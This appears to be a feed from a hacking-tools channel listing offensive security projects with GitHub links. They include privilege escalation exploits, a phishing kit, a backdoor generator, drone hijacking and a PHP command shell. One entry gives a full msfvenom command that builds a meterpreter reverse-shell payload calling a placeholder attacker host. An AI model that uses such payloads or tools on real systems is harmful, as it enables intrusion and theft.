HackGit

2022-04-28 14:14:00 ​ReconSpider

Most Advanced Open Source Intelligence (OSINT) Framework for scanning IP Address, Emails, Websites, Organizations and find out information from different sources.

https://github.com/bhavsec/reconspider Открыть/Комментировать

2022-04-28 09:58:01 ​Invoker

Penetration testing utility and antivirus assessment tool.

Built with Visual Studio Community 2019 v16.11.10 (64-bit) and tested on Windows 10 Enterprise OS (64-bit).

This repository started to have known signatures and I don't have time to upload new executables each time so you should compile this project yourself.

Learn more about process injection techniques from this article.

Future plans:
process hollowing,
process doppelgänging,
process herpaderping,
process ghosting,
more DLL proxying invocations,
COM hijacking,
Python3 script to statically obfuscate whole source code.

https://github.com/ivan-sincek/invoker Открыть/Комментировать

2022-04-27 21:32:54 ​KrbRelayUp Universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings) https://github.com/Dec0ne/KrbRelayUp #ad #privesc #kerberos #ldap #relay Открыть/Комментировать

2022-04-27 16:16:01 Kubernetes Goat

Designed to be an intentionally vulnerable cluster environment to learn and practice Kubernetes security.

https://github.com/madhuakula/kubernetes-goat Открыть/Комментировать

2022-04-27 16:16:00 SkyJack

Drone engineered to autonomously seek out, hack, and wirelessly take full control over any other drones within wireless or flying distance, creating an army of zombie drones under your control.

https://github.com/samyk/skyjack Открыть/Комментировать

2022-04-27 16:16:00 ​BellasEye

A lightweight program written in BASH which automates and saves time during vulnerability analysis and penetration testing. It automates various tools such as NMAP, Gobuster, theHarvester etc.

It uses a custom designed Vulnerability Lookup which parses major databases like ExploitDB, National Vulnerability Database and VulDB (requires an API key). It saves all the outputs to separate files for easy use.

https://github.com/necromorph98/BellasEye Открыть/Комментировать

2022-04-27 14:14:00 ​KILLSHOT

A #Penetration Testing Framework, Information gathering tool & Website #vulnerability Scanner.

You Can use this tool to Spider your website and get important information and gather information automatically using whatweb-host-traceroute-dig-fierce-wafw00f or to Identify the cms and find the vulnerability in your website using Cms #Exploit Scanner && WebApp Vul Scanner Also You can use killshot to Scan automatically multiple types of scan with #nmap and unicorn. And With this tool, You can Generate #PHP Simple Backdoors upload it manually and connect to the target using killshot.

This Tool Bearing A simple Ruby Fuzzer Tested on VULSERV.exe And Linux Log clear script To change the content of login paths Spider can help you to find the parameter of the site and scan #XSS and #sql.

https://github.com/bahaabdelwahed/killshot Открыть/Комментировать

2022-04-27 11:11:00 ​HiddenEye

Modern Phishing Tool With Advanced Functionality

https://github.com/Morsmalleo/HiddenEye Открыть/Комментировать

2022-04-27 09:51:39 The Not-So Simple PHP Command Shell

Automates or simplifies many on target functions. Designed for windows targets. It isn't pretty, but it works as intended.

I have included an assortment of common windows enumeration and escalation tools. To generate your own msfvenom payload:

venom.exe : sudo msfvenom -p windows/meterpreter/reverse_tcp LHOST=(ATTACKBOXIP) LPORT=(ATTACBOXPORT) -e x64/shikata_ga_nai -f exe -o venom.exe

Including:
Simple system commands
File upload/download options
simple user manipulations (on compatible targets with sufficient privileges)
One click user info/ user permissions info
One click systeminfo
One Click processes list
One click file cleanup removes all files uploaded with this tool

https://github.com/kaotickj/The-Not-So-Simple-PHP-Command-Shell Открыть/Комментировать

2022-04-27 09:34:13 ​ZoneAlarmLPE

Exploit for LPE in ZoneAlarm Antivirus/Firewall.

Combination of weak permissions in C:\ProgramData\CheckPoint\ZoneAlaram\Data and self-protection bypass (self-protection driver failed to protect sensitive files from modification when file is accessed over UNC path) leads to LPE allowing any local user to elevate privileges to SYSTEM account.

https://github.com/Wh04m1001/ZoneAlarmLPE Открыть/Комментировать